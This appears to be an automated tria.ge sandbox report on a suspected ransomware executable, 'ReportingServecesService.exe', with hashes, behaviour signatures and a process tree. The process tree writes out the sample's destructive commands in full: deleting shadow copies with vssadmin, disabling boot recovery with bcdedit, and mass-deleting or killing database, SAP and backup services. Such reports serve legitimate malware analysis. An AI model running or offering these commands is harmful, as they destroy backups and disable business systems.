Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
4s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
23/09/2022, 16:04
General
-
Target
ReportingServecesService.exe
-
Size
158KB
-
MD5
a8e214683307adaff39783dc656b398a
-
SHA1
a4f0e624bd1292130ac46d242e42f33b724665bf
-
SHA256
df64e87ecb30f4cadf54f2c1b3d3cba8cc2d315db0fd4af2d11add57baa56f6a
-
SHA512
9dacd78fdecc64fb5ead740e5e3cd4248bf46a45f1c70dbde950a8231a44dedd961a6f05d44983accfa519193ea466901ac7e7e6725b66fed9fe2e4ccf10429c
-
SSDEEP
3072:y15pcSM4lVY8n8q4wJ8YB5mvig79NvGBdY04cABYK5lht9Raz+BVfRoio+00C/:y15pcKVfJ8MI7XvQLfAW6t5BdFC/
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in Program Files directory 18 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ReportingServecesService.exe"C:\Users\Admin\AppData\Local\Temp\ReportingServecesService.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet2⤵
- Interacts with shadow copies
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C sc delete MsDtsServer100&&sc delete MSSQL$SOPHOS&&sc delete MSSQLFDLauncher&&sc delete MSSQLSERVER&&sc delete MSSQLServerADHelper100&&sc delete MSSQLServerOLAPService&&sc delete ReportServer&&sc delete SQLAgent$SOPHOS&&sc delete "SQLANYs_sem5"&&sc delete SQLBrowser&&sc delete SQLSERVERAGENT&&sc delete SQLWriter&&sc delete B1LicenseService&&sc delete b1s50000&&sc delete b1s50001&&sc delete b1s50002&&sc delete B1ServerTools&&sc delete B1ServerTools64&&sc delete B1Workflow&&sc delete COMSysApp&&sc delete Gatekeeper64&&sc delete isapnp&&sc delete "SAP Business One RSP Agent Service"&&sc delete SBOClientAgent&&sc delete "SBODI_Server"&&sc delete SBOMail&&sc delete SBOWFDataAccess&&&&&&taskkill /f /im db*&&taskkill /f /im apache*&&taskkill /f /im mysql*&&taskkill /f /im Notifier*&&taskkill /f /im IBM*&&taskkill /f /im copy*&&taskkill /f /im store*&&taskkill /f /im sql*&&taskkill /f /im vee*&&taskkill /f /im wrsa*&&taskkill /f /im postg*&&taskkill /f /im sage*&&taskkill /f /im msdt*&&taskkill /f /im ora*&&taskkill /f /im microsoft*&&taskkill /f /im backup*&&taskkill /f /im http*&&taskkill /f /im office*&&taskkill /f /im cube*&&taskkill /f /im team*&&taskkill /f /im b1*&&taskkill /f /im sbo*&&taskkill /f /im reporting*&&taskkill /f /im sav*&&taskkill /f /im fd*&&taskkill /f /im microsoft*&&&&net stop MSSQLFDLauncher&&net stop MSSQLServerOLAPService&&net stop ReportServer2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no2⤵
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB